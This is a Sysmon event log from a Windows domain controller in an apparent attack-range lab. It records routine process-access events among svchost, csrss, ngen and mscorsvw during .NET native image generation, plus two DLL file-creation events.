13:45:52.250{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9110-6005-7701-00000000A301}4240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:52.250{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9110-6005-7701-00000000A301}4240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:52.250{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9110-6005-7701-00000000A301}4240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:52.141{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9110-6005-7601-00000000A301}1652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:52.125{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9110-6005-7601-00000000A301}1652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:52.125{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9110-6005-7601-00000000A301}1652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:53.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9111-6005-7901-00000000A301}4344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:53.172{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9111-6005-7901-00000000A301}4344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:53.172{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9111-6005-7901-00000000A301}4344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:55.922{59A5CD1D-9111-6005-7901-00000000A301}4344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\10f8-0\Microsoft.ActiveDirectory.Management.dll2021-01-18 13:45:55.922 10341000x80000000000000005752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:56.109{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9114-6005-7B01-00000000A301}3108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:56.094{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9114-6005-7B01-00000000A301}3108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:56.094{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9114-6005-7B01-00000000A301}3108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:56.047{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9114-6005-7A01-00000000A301}4696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:56.047{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9114-6005-7A01-00000000A301}4696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:56.047{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9114-6005-7A01-00000000A301}4696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.891{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9115-6005-8301-00000000A301}3028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.891{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9115-6005-8301-00000000A301}3028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.891{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9115-6005-8301-00000000A301}3028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.859{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9115-6005-8201-00000000A301}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.859{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9115-6005-8201-00000000A301}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.859{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9115-6005-8201-00000000A301}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:57.828{59A5CD1D-9115-6005-8101-00000000A301}4252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\109c-0\Microsoft.GroupPolicy.Management.dll2021-01-18 13:45:57.828 10341000x80000000000000005773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.656{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9115-6005-8101-00000000A301}4252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.641{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9115-6005-8101-00000000A301}4252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.641{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9115-6005-8101-00000000A301}4252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.609{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9115-6005-8001-00000000A301}3448C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 